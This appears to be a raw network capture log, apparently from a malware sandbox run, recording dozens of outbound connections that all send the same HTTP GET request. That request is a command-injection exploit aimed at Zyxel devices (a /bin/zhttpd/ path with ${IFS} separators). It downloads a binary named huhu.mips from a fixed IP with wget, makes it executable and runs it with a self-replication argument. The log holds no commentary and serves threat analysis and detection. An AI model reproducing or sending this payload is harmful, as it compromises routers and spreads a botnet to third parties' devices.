                                                        Feb 2, 2024 06:21:02.791347980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2720192.168.2.1448922100.20.7.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791384935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2721192.168.2.1435226187.180.221.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791416883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2722192.168.2.145629659.1.8.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791470051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2723192.168.2.1438792194.224.173.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791516066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2724192.168.2.1446228155.69.126.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791553974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2725192.168.2.144652277.139.167.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791610003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2726192.168.2.1440830218.148.110.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791634083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2727192.168.2.1434270123.254.3.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791671038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2728192.168.2.145211832.41.113.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791706085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2729192.168.2.1441150107.82.151.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791750908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2730192.168.2.1447548155.229.92.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791779995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2731192.168.2.1450608180.163.199.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791835070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2732192.168.2.145139092.189.224.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791870117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2733192.168.2.1458696174.227.160.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791917086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2734192.168.2.1438294152.164.210.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791946888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2735192.168.2.144825679.134.10.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791996002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2736192.168.2.1452504140.202.27.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792037964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2737192.168.2.1440698115.30.231.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792071104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2738192.168.2.1456280193.68.49.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792125940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2739192.168.2.145196059.162.225.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792152882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2740192.168.2.1433564124.251.91.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792188883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2741192.168.2.144634813.177.219.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792227030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2742192.168.2.1449344211.160.49.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792264938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2743192.168.2.143616662.20.117.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792301893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2744192.168.2.1434248187.44.29.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792323112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2745192.168.2.144435462.209.44.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792367935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2746192.168.2.1447174165.181.6.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792401075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2747192.168.2.143977641.14.42.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792439938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2748192.168.2.1449696135.251.108.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792476892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2749192.168.2.1433236126.41.94.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792496920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2750192.168.2.1438774180.62.70.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792552948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2751192.168.2.143788227.165.92.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792602062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2752192.168.2.145895658.25.96.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792654991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2753192.168.2.1445760134.252.61.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792675972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2754192.168.2.1448834205.108.190.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792731047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2755192.168.2.143440637.108.41.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792787075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2756192.168.2.143437057.120.79.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792817116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2757192.168.2.1459312187.1.238.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792876959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2758192.168.2.1452388189.252.90.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792903900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2759192.168.2.14358505.164.72.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792943954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2760192.168.2.1442170209.156.190.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.792965889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2761192.168.2.145588878.137.18.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793001890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2762192.168.2.1455850173.122.246.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793025017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2763192.168.2.1439964157.82.159.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793059111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2764192.168.2.144963280.226.176.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793101072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2765192.168.2.145270063.1.252.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793140888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2766192.168.2.1433534181.160.45.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793173075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2767192.168.2.144768898.153.111.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793191910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2768192.168.2.1457028186.183.180.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793231964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2769192.168.2.1459734211.230.115.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793284893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2770192.168.2.1452122113.99.27.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793327093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2771192.168.2.1445190188.45.74.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793368101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2772192.168.2.143508270.132.217.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793410063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2773192.168.2.1442564136.126.38.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793448925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2774192.168.2.1439602205.189.168.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793482065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2775192.168.2.14359168.189.252.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793524981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2776192.168.2.1453400120.229.130.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793577909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2777192.168.2.1440806150.158.60.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793612957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2778192.168.2.1456194130.187.186.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793642998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2779192.168.2.144961475.241.150.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793699980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2780192.168.2.1454410198.92.208.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793740988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2781192.168.2.1441290169.192.235.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793778896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2782192.168.2.1444266106.7.145.16443
                                                        TimestampBytes transferredDirectionData
